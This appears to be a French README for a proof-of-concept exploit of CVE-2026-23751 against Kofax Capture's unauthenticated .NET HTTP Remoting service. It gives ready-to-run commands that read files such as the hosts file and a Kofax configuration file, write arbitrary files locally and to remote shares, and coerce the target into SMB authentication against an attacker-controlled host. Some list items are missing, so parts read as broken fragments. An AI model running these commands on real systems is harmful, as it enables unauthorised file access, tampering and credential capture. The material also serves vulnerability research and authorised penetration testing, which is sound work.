
Client Remoting corrigé pour exploiter CVE-2026-23751 (Tungsten Automation - Kofax Capture : lecture/écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting)
Réimplémentation de preuve de concept de la technique décrite dans Code White's NewRemotingTricks, ciblant Tungsten Automation Kofax Capture.
Titre : Tungsten Automation - Kofax Capture Lecture/Écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting
CVE : CVE-2026-23751
CVE-2026-23751 affecte Tungsten Automation Kofax Capture et permet à un attaquant distant non authentifié d'interagir avec un point de terminaison .NET HTTP Remoting exposé par le ACService de Kofax Capture.
La vulnérabilité peut être exploitée pour effectuer :
Le PoC réimplémente la technique .NET Remoting pertinente du projet NewRemotingTricks de Code White.
Le PoC cible le point de terminaison HTTP Remoting de Kofax Capture :
ACServicehttp://<target>:2424/ACService
Le port 2424 est le port HTTP Remoting par défaut utilisé par le service affecté.
L'exemple suivant lit le fichier hosts de Windows sur la cible :
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Un fichier de configuration de Kofax Capture peut être lu de la même manière :
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
Un fichier peut être écrit dans un emplacement accessible par le service Kofax Capture en fournissant le chemin cible suivi du contenu :
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
La même fonctionnalité peut être utilisée avec un chemin UNC pour écrire sur un partage SMB distant :
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
La capacité d'accéder à la ressource distante dépend des autorisations et du contexte de sécurité du service Kofax Capture.
Une URI file:// peut être fournie pour amener la cible à accéder à une ressource SMB distante :
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
Cela peut amener l'hôte affecté à s'authentifier auprès du serveur SMB contrôlé par l'attaquant, selon l'environnement cible et sa configuration de sécurité.
La vulnérabilité implique l'utilisation de .NET HTTP Remoting par le ACService de Kofax Capture.
.NET Remoting prend en charge divers schémas d'URI et mécanismes de sérialisation d'objets. En interagissant d'une manière spécifique avec le point de terminaison remoting exposé, un client non authentifié peut amener le service à effectuer des opérations sur le système de fichiers en utilisant des chemins fournis par le client.
Le PoC démontre comment ce comportement peut être utilisé pour :
file:// distantesLe PoC démontre actuellement l'écriture de données de type chaîne dans des fichiers. D'autres types de fichiers et formats de charge utile peuvent être pris en charge en modifiant le code source en conséquence.
Cette implémentation est basée sur les recherches et techniques présentées dans :
Code White - NewRemotingTricks
ACService de Kofax Capture de la cibleRemotingClient_MBRO_Lazy.exeAucune authentification auprès du service Kofax Capture n'est requise pour l'exploitation.
Ce dépôt est fourni à des fins de recherche en sécurité, de validation de vulnérabilités et de tests d'intrusion autorisés uniquement.
N'utilisez pas ce PoC contre des systèmes sans autorisation explicite. L'auteur n'est pas responsable des dommages, pertes de données, accès non autorisés ou autres conséquences résultant d'une mauvaise utilisation de ce logiciel.